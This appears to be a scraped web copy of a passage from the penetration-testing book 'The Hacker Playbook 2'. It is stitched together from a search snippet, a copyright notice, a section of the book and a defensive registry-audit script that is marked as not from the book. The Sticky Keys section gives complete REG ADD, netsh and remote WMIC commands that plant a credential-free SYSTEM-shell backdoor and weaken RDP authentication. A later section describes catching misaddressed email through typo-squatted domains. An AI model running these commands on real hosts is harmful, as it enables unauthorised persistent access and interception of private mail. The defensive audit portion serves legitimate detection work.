The Hacker Playbook 2: Practical Guide To ... - arthur-training.com

Jul 1, 2015 - Open Source Versus Commercial Software. Setting Up Your .... You need to have some experience with Microso
THE HACKER PLAYBOOK 2 Practical Guide To Penetration Testing Peter Kim

Copyright © 2015 by Secure Planet LLC. All rights reserved. Except as permitted under the United States Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a

Sticky Keys

● Allow Remote Desktop through the Windows firewall
  ○ netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
● Enable Remote Desktop Connections
  ○ REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Don't forget the power of WMI and being able to trigger these settings remotely. Remember, you will be a privileged local administrative account or domain admin.
● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\windows\system32\cmd.exe\" /f"
● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f"
● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v SecurityLayer /t REG_DWORD /d 0 /f"

Optional Commands:
● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes"
● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

Because we are leveraging WMI, you also have the ability to use Kerberos, if needed, by changing the username/password to /authority:"Kerberos:[Domain]\[Server]". Remember pass the ticket?

Once we have configured these registry settings, we can RDP to that host without any credentials, press Shift five times, and we have a SYSTEM shell. If you ever lose your original shell and the user changes their password, you still have your backdoor.
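As an added defensive check that is not from the book: the script below parses a text dump made with reg export and flags exactly the values the commands in this section set, the IFEO Debugger on sethc.exe and the three Remote Desktop values. Extending the Debugger check to the other accessibility helpers (utilman.exe, osk.exe, narrator.exe, magnify.exe) is this example's own assumption, and the sample dump is constructed.

```python
# Added example, not from the book: audit a "reg export" text dump for the
# Sticky Keys backdoor (an IFEO Debugger on an accessibility binary) and the
# RDP-weakening values this section sets. Key paths are real; the dump is constructed.
IFEO = r"hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options"
TS = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
# sethc.exe is the book's target; the other accessibility helpers are this example's own addition.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe"}

def parse_reg_export(text):
    """Return {key_path_lowercased: {value_name: raw_data}} from .reg text."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            keys[current][name.strip('"')] = data
    return keys

def audit_sticky_keys(text):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings, keys = [], parse_reg_export(text)
    for path, values in keys.items():
        exe = path.rsplit("\\", 1)[-1]
        if path.startswith(IFEO + "\\") and exe in ACCESSIBILITY_BINARIES and "Debugger" in values:
            findings.append(f"IFEO Debugger set for {exe}: {values['Debugger']}")
    if keys.get(TS, {}).get("fDenyTSConnections") == "dword:00000000":
        findings.append("fDenyTSConnections=0: Remote Desktop connections enabled")
    rdp = keys.get(TS + r"\winstations\rdp-tcp", {})
    if rdp.get("UserAuthentication") == "dword:00000000":
        findings.append("UserAuthentication=0: Network Level Authentication disabled")
    if rdp.get("SecurityLayer") == "dword:00000000":
        findings.append("SecurityLayer=0: legacy RDP security layer selected")
    return findings

# Constructed sample mirroring the section's REG ADD commands.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\windows\\system32\\cmd.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000
"SecurityLayer"=dword:00000000
'''

if __name__ == "__main__":
    print("\n".join(audit_sticky_keys(SAMPLE_REG)))
```

On a live host, feed it the output of reg export for the two hives above; any IFEO Debugger on an accessibility binary is a finding to investigate, since Windows never sets one by default.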

Conclusion

I hope this chapter was able to get you comfortable with getting onto the network and moving laterally through the network. There are a large number of attacks that can help in both lateral movement and privilege escalation, but it really comes down to understanding what is in scope of your test and what has the highest probability of assisting you. It might take a few of the attacks in the Lateral Movement section to get you to a Domain Administrator, but keep this chapter handy, as sometimes you will run into a brick wall and something in this book might just get you out of a jam.

The Screen - Social Engineering

If client attacks are in the scope of your tests, social engineering is your "go to" attack. There are many different ways to perform social engineering attacks, and these can range from domain attacks to spear phishing, or even dropping USB sticks. Since social engineering attacks really use your own creativity, I will just go over a few examples that I have found to be fruitful.

Doppelganger Domains

I spent a lot of research time looking into doppelganger domains and trying to find the most efficient and most "bang for your buck" attacks. You can find more in my research paper here: http://www.wired.com/threatlevel/2011/09/doppelganger-domains/. The concept of my research paper was to brute-force company domains for valid subdomains that had MX records. For my next few examples, we have two different fictitious companies who utilize their sub-domains for email: us.company.com and uk.company.com. What I had done was to purchase all domains for uscompany.com, ukcompany.com and so on. This is because end users very frequently make the mistake of forgetting to type in the period between the domain and sub-domain.

SMTP Attack

Once I purchased these domains, I set up an SMTP server, configured the MX records, and finally set all SMTP servers as catch-all servers. This means that if anyone emails the domain I own, regardless of to whom it is sent, I would record/forward all those emails to an account of my choice. This is usually enough to prove that you can successfully capture sensitive